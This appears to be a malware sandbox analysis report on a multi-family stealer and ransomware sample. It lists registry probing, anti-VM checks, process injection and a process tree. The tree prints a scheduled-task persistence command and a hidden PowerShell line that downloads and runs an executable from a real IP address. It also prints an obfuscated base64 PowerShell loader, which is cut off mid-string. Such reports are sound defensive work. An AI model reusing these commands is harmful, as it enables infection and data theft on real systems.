Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2025-04-02_34a337d692950cbf43cfc0dcda3a8704_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TempXUWOVZASFR2G7HWIBFVW1P2CM0LUTOLD.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bf63e36e97.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost015.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	81bb507991.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	261.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	261.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	apple.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	6089caffb3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	p3hx1_003.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage	8726cdeb67.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Chel3raiO6Ri.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	8726cdeb67.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	772224823d.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost015.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	fontdrvhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	261.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	250ab1997b.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language	8726cdeb67.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rm3cVPI.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe

Checks processor information in registry 2 TTPs 24 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	d8bc43181b.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	d8bc43181b.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe

Delays execution with timeout.exe 2 IoCs

pid	Process
3620	timeout.exe
5520	timeout.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Kills process with taskkill 64 IoCs

pid	Process
4308	taskkill.exe
2404	taskkill.exe
5500	taskkill.exe
4156	taskkill.exe
5652	taskkill.exe
4564	taskkill.exe
1752	taskkill.exe
2700	taskkill.exe
3036	taskkill.exe
532	taskkill.exe
2172	taskkill.exe
3968	taskkill.exe
5780	taskkill.exe
2924	taskkill.exe
1072	taskkill.exe
5856	taskkill.exe
3688	taskkill.exe
4836	taskkill.exe
3608	taskkill.exe
5508	taskkill.exe
5236	taskkill.exe
3856	taskkill.exe
4040	taskkill.exe
3776	taskkill.exe
2404	taskkill.exe
5360	taskkill.exe
4684	taskkill.exe
1184	taskkill.exe
3780	taskkill.exe
2260	taskkill.exe
1540	taskkill.exe
5736	taskkill.exe
5948	taskkill.exe
6032	taskkill.exe
4712	taskkill.exe
3648	taskkill.exe
4872	taskkill.exe
1704	taskkill.exe
2552	taskkill.exe
3108	taskkill.exe
4884	taskkill.exe
5716	taskkill.exe
5020	taskkill.exe
4692	taskkill.exe
3484	taskkill.exe
1812	taskkill.exe
5604	taskkill.exe
4508	taskkill.exe
2412	taskkill.exe
716	taskkill.exe
2412	taskkill.exe
5892	taskkill.exe
3896	taskkill.exe
4708	taskkill.exe
1000	taskkill.exe
4736	taskkill.exe
4804	taskkill.exe
4908	taskkill.exe
3728	taskkill.exe
5536	taskkill.exe
2584	taskkill.exe
4988	taskkill.exe
1952	taskkill.exe
4580	taskkill.exe

Modifies data under HKEY_USERS 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	msedge.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133880334295601935"	chrome.exe

Modifies registry class 6 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000_Classes\Local Settings	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000_Classes\Local Settings	rapes.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3342763580-2723508992-2885672917-1000\{886B145B-986D-4572-8F50-D841B47B160A}	chrome.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3342763580-2723508992-2885672917-1000\{EA33DEEB-2D4D-4BE1-8214-07BC486EE2EF}	msedge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3342763580-2723508992-2885672917-1000\{00D70F46-2A2A-41D5-9F8B-D82697DBEB7A}	msedge.exe

NTFS ADS 1 IoCs

description	ioc	Process
File created	C:\C:\Users\Admin\AppData\Local\Temp\dxdiag_temp_4074842567.txt\	cmd.exe

Runs net.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
2312	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1016	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
5984	powershell.exe
5984	powershell.exe
4948	TempXUWOVZASFR2G7HWIBFVW1P2CM0LUTOLD.EXE
4948	TempXUWOVZASFR2G7HWIBFVW1P2CM0LUTOLD.EXE
1060	rapes.exe
1060	rapes.exe
2944	rapes.exe
2944	rapes.exe
1016	powershell.exe
1016	powershell.exe
1016	powershell.exe
5360	powershell.exe
5360	powershell.exe
5360	powershell.exe
2716	captcha.exe
2716	captcha.exe
2716	captcha.exe
2716	captcha.exe
2716	captcha.exe
2716	captcha.exe
1656	powershell.exe
1656	powershell.exe
1656	powershell.exe
2360	powershell.exe
2360	powershell.exe
2360	powershell.exe
432	powershell.exe
432	powershell.exe
432	powershell.exe
1352	chrome.exe
1352	chrome.exe
5284	772224823d.exe
5284	772224823d.exe
2716	captcha.exe
2716	captcha.exe
2716	captcha.exe
2716	captcha.exe
2716	captcha.exe
2716	captcha.exe
5316	powershell.exe
5316	powershell.exe
5316	powershell.exe
1324	powershell.exe
1324	powershell.exe
1324	powershell.exe
5728	powershell.exe
5728	powershell.exe
5728	powershell.exe
2260	powershell.exe
2260	powershell.exe
2260	powershell.exe
5408	powershell.exe
5408	powershell.exe
5408	powershell.exe
3980	rapes.exe
3980	rapes.exe
4912	250ab1997b.exe
4912	250ab1997b.exe
5424	bf63e36e97.exe
5424	bf63e36e97.exe
5424	bf63e36e97.exe
5424	bf63e36e97.exe
5424	bf63e36e97.exe
5424	bf63e36e97.exe

Suspicious behavior: LoadsDriver 5 IoCs

pid	Process
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
6744	tzutil.exe

Suspicious behavior: MapViewOfSection 3 IoCs

pid	Process
5948	p3hx1_003.exe
5948	p3hx1_003.exe
5948	p3hx1_003.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	5984	powershell.exe
Token: SeDebugPrivilege	1016	powershell.exe
Token: SeDebugPrivilege	5360	powershell.exe
Token: SeDebugPrivilege	4952	tasklist.exe
Token: SeDebugPrivilege	4744	tasklist.exe
Token: SeDebugPrivilege	740	tasklist.exe
Token: SeDebugPrivilege	1656	powershell.exe
Token: SeDebugPrivilege	1952	tasklist.exe
Token: SeDebugPrivilege	1956	tasklist.exe
Token: SeDebugPrivilege	2360	powershell.exe
Token: SeDebugPrivilege	4524	tasklist.exe
Token: SeDebugPrivilege	3664	tasklist.exe
Token: SeIncreaseQuotaPrivilege	2360	powershell.exe
Token: SeSecurityPrivilege	2360	powershell.exe
Token: SeTakeOwnershipPrivilege	2360	powershell.exe
Token: SeLoadDriverPrivilege	2360	powershell.exe
Token: SeSystemProfilePrivilege	2360	powershell.exe
Token: SeSystemtimePrivilege	2360	powershell.exe
Token: SeProfSingleProcessPrivilege	2360	powershell.exe
Token: SeIncBasePriorityPrivilege	2360	powershell.exe
Token: SeCreatePagefilePrivilege	2360	powershell.exe
Token: SeBackupPrivilege	2360	powershell.exe
Token: SeRestorePrivilege	2360	powershell.exe
Token: SeShutdownPrivilege	2360	powershell.exe
Token: SeDebugPrivilege	2360	powershell.exe
Token: SeSystemEnvironmentPrivilege	2360	powershell.exe
Token: SeRemoteShutdownPrivilege	2360	powershell.exe
Token: SeUndockPrivilege	2360	powershell.exe
Token: SeManageVolumePrivilege	2360	powershell.exe
Token: 33	2360	powershell.exe
Token: 34	2360	powershell.exe
Token: 35	2360	powershell.exe
Token: 36	2360	powershell.exe
Token: SeDebugPrivilege	4460	tasklist.exe
Token: SeDebugPrivilege	5336	tasklist.exe
Token: SeDebugPrivilege	432	powershell.exe
Token: SeDebugPrivilege	6016	tasklist.exe
Token: SeDebugPrivilege	1156	tasklist.exe
Token: SeDebugPrivilege	5576	tasklist.exe
Token: SeDebugPrivilege	740	tasklist.exe
Token: SeDebugPrivilege	2528	tasklist.exe
Token: SeDebugPrivilege	1812	taskkill.exe
Token: SeDebugPrivilege	4724	tasklist.exe
Token: SeDebugPrivilege	2404	taskkill.exe
Token: SeDebugPrivilege	2068	taskkill.exe
Token: SeDebugPrivilege	6096	tasklist.exe
Token: SeDebugPrivilege	5604	taskkill.exe
Token: SeDebugPrivilege	1656	taskkill.exe
Token: SeDebugPrivilege	1752	taskkill.exe
Token: SeDebugPrivilege	2780	taskkill.exe
Token: SeDebugPrivilege	5360	taskkill.exe
Token: SeDebugPrivilege	1952	taskkill.exe
Token: SeDebugPrivilege	5892	taskkill.exe
Token: SeDebugPrivilege	5856	taskkill.exe
Token: SeDebugPrivilege	4736	taskkill.exe
Token: SeDebugPrivilege	2700	taskkill.exe
Token: SeDebugPrivilege	4580	taskkill.exe
Token: SeDebugPrivilege	5236	taskkill.exe
Token: SeDebugPrivilege	4684	taskkill.exe
Token: SeDebugPrivilege	5716	taskkill.exe
Token: SeDebugPrivilege	912	taskkill.exe
Token: SeDebugPrivilege	5948	taskkill.exe
Token: SeDebugPrivilege	5500	taskkill.exe
Token: SeDebugPrivilege	3728	taskkill.exe

Suspicious use of FindShellTrayWindow 35 IoCs

pid	Process
3588	2025-04-02_34a337d692950cbf43cfc0dcda3a8704_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
3588	2025-04-02_34a337d692950cbf43cfc0dcda3a8704_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
3588	2025-04-02_34a337d692950cbf43cfc0dcda3a8704_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
1352	chrome.exe
1944	msedge.exe
6132	8726cdeb67.exe
6132	8726cdeb67.exe
6132	8726cdeb67.exe
6132	8726cdeb67.exe
6132	8726cdeb67.exe
6132	8726cdeb67.exe
6132	8726cdeb67.exe
6132	8726cdeb67.exe
5144	firefox.exe
5144	firefox.exe
5144	firefox.exe
5144	firefox.exe
5144	firefox.exe
5144	firefox.exe
5144	firefox.exe
5144	firefox.exe
6132	8726cdeb67.exe
5144	firefox.exe
5144	firefox.exe
5144	firefox.exe
5144	firefox.exe
5144	firefox.exe
5144	firefox.exe
5144	firefox.exe
5144	firefox.exe
5144	firefox.exe
5144	firefox.exe
6132	8726cdeb67.exe
6132	8726cdeb67.exe
6132	8726cdeb67.exe

Suspicious use of SendNotifyMessage 27 IoCs

pid	Process
3588	2025-04-02_34a337d692950cbf43cfc0dcda3a8704_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
3588	2025-04-02_34a337d692950cbf43cfc0dcda3a8704_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
3588	2025-04-02_34a337d692950cbf43cfc0dcda3a8704_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
6132	8726cdeb67.exe
6132	8726cdeb67.exe
6132	8726cdeb67.exe
6132	8726cdeb67.exe
6132	8726cdeb67.exe
6132	8726cdeb67.exe
6132	8726cdeb67.exe
6132	8726cdeb67.exe
5144	firefox.exe
5144	firefox.exe
5144	firefox.exe
5144	firefox.exe
6132	8726cdeb67.exe
5144	firefox.exe
5144	firefox.exe
5144	firefox.exe
5144	firefox.exe
5144	firefox.exe
5144	firefox.exe
5144	firefox.exe
5144	firefox.exe
6132	8726cdeb67.exe
6132	8726cdeb67.exe
6132	8726cdeb67.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
5144	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3588 wrote to memory of 232	3588	2025-04-02_34a337d692950cbf43cfc0dcda3a8704_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	86
PID 3588 wrote to memory of 232	3588	2025-04-02_34a337d692950cbf43cfc0dcda3a8704_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	86
PID 3588 wrote to memory of 232	3588	2025-04-02_34a337d692950cbf43cfc0dcda3a8704_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	86
PID 3588 wrote to memory of 2540	3588	2025-04-02_34a337d692950cbf43cfc0dcda3a8704_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	87
PID 3588 wrote to memory of 2540	3588	2025-04-02_34a337d692950cbf43cfc0dcda3a8704_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	87
PID 3588 wrote to memory of 2540	3588	2025-04-02_34a337d692950cbf43cfc0dcda3a8704_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	87
PID 232 wrote to memory of 2312	232	cmd.exe	89
PID 232 wrote to memory of 2312	232	cmd.exe	89
PID 232 wrote to memory of 2312	232	cmd.exe	89
PID 2540 wrote to memory of 5984	2540	mshta.exe	93
PID 2540 wrote to memory of 5984	2540	mshta.exe	93
PID 2540 wrote to memory of 5984	2540	mshta.exe	93
PID 5984 wrote to memory of 4948	5984	powershell.exe	98
PID 5984 wrote to memory of 4948	5984	powershell.exe	98
PID 5984 wrote to memory of 4948	5984	powershell.exe	98
PID 4948 wrote to memory of 1060	4948	TempXUWOVZASFR2G7HWIBFVW1P2CM0LUTOLD.EXE	100
PID 4948 wrote to memory of 1060	4948	TempXUWOVZASFR2G7HWIBFVW1P2CM0LUTOLD.EXE	100
PID 4948 wrote to memory of 1060	4948	TempXUWOVZASFR2G7HWIBFVW1P2CM0LUTOLD.EXE	100
PID 1060 wrote to memory of 5524	1060	rapes.exe	105
PID 1060 wrote to memory of 5524	1060	rapes.exe	105
PID 1060 wrote to memory of 5524	1060	rapes.exe	105
PID 5524 wrote to memory of 5036	5524	cmd.exe	107
PID 5524 wrote to memory of 5036	5524	cmd.exe	107
PID 5524 wrote to memory of 5036	5524	cmd.exe	107
PID 5036 wrote to memory of 1016	5036	cmd.exe	109
PID 5036 wrote to memory of 1016	5036	cmd.exe	109
PID 5036 wrote to memory of 1016	5036	cmd.exe	109
PID 1016 wrote to memory of 5360	1016	powershell.exe	110
PID 1016 wrote to memory of 5360	1016	powershell.exe	110
PID 1016 wrote to memory of 5360	1016	powershell.exe	110
PID 1060 wrote to memory of 2716	1060	rapes.exe	112
PID 1060 wrote to memory of 2716	1060	rapes.exe	112
PID 2716 wrote to memory of 1540	2716	captcha.exe	113
PID 2716 wrote to memory of 1540	2716	captcha.exe	113
PID 2716 wrote to memory of 212	2716	captcha.exe	116
PID 2716 wrote to memory of 212	2716	captcha.exe	116
PID 212 wrote to memory of 5320	212	net.exe	118
PID 212 wrote to memory of 5320	212	net.exe	118
PID 2716 wrote to memory of 3664	2716	captcha.exe	119
PID 2716 wrote to memory of 3664	2716	captcha.exe	119
PID 2716 wrote to memory of 4952	2716	captcha.exe	121
PID 2716 wrote to memory of 4952	2716	captcha.exe	121
PID 1060 wrote to memory of 396	1060	rapes.exe	123
PID 1060 wrote to memory of 396	1060	rapes.exe	123
PID 1060 wrote to memory of 396	1060	rapes.exe	123
PID 2716 wrote to memory of 4744	2716	captcha.exe	124
PID 2716 wrote to memory of 4744	2716	captcha.exe	124
PID 2716 wrote to memory of 740	2716	captcha.exe	126
PID 2716 wrote to memory of 740	2716	captcha.exe	126
PID 2716 wrote to memory of 4692	2716	captcha.exe	128
PID 2716 wrote to memory of 4692	2716	captcha.exe	128
PID 396 wrote to memory of 4464	396	apple.exe	130
PID 396 wrote to memory of 4464	396	apple.exe	130
PID 396 wrote to memory of 4464	396	apple.exe	130
PID 396 wrote to memory of 4708	396	apple.exe	132
PID 396 wrote to memory of 4708	396	apple.exe	132
PID 396 wrote to memory of 4708	396	apple.exe	132
PID 4708 wrote to memory of 3436	4708	261.exe	133
PID 4708 wrote to memory of 3436	4708	261.exe	133
PID 4464 wrote to memory of 1308	4464	261.exe	134
PID 4464 wrote to memory of 1308	4464	261.exe	134
PID 2716 wrote to memory of 1656	2716	captcha.exe	137
PID 2716 wrote to memory of 1656	2716	captcha.exe	137
PID 3436 wrote to memory of 2412	3436	cmd.exe	138

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:2268
- C:\Windows\SysWOW64\fontdrvhost.exe
  "C:\Windows\System32\fontdrvhost.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:7300

C:\Users\Admin\AppData\Local\Temp\2025-04-02_34a337d692950cbf43cfc0dcda3a8704_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
"C:\Users\Admin\AppData\Local\Temp\2025-04-02_34a337d692950cbf43cfc0dcda3a8704_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3588
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /create /tn SEysXmamn4o /tr "mshta C:\Users\Admin\AppData\Local\Temp\wk98sbHaS.hta" /sc minute /mo 25 /ru "Admin" /f
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:232
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /tn SEysXmamn4o /tr "mshta C:\Users\Admin\AppData\Local\Temp\wk98sbHaS.hta" /sc minute /mo 25 /ru "Admin" /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:2312
- C:\Windows\SysWOW64\mshta.exe
  mshta C:\Users\Admin\AppData\Local\Temp\wk98sbHaS.hta
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2540
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'XUWOVZASFR2G7HWIBFVW1P2CM0LUTOLD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Downloads MZ/PE file
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:5984
  - - C:\Users\Admin\AppData\Local\TempXUWOVZASFR2G7HWIBFVW1P2CM0LUTOLD.EXE
      "C:\Users\Admin\AppData\Local\TempXUWOVZASFR2G7HWIBFVW1P2CM0LUTOLD.EXE"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:4948
    - - C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
        
        "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Downloads MZ/PE file
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Identifies Wine through registry keys
        Adds Run key to start application
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:1060
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10409161121\5ym0ZYg.cmd"
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:5524
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10409161121\5ym0ZYg.cmd"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:5036
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dk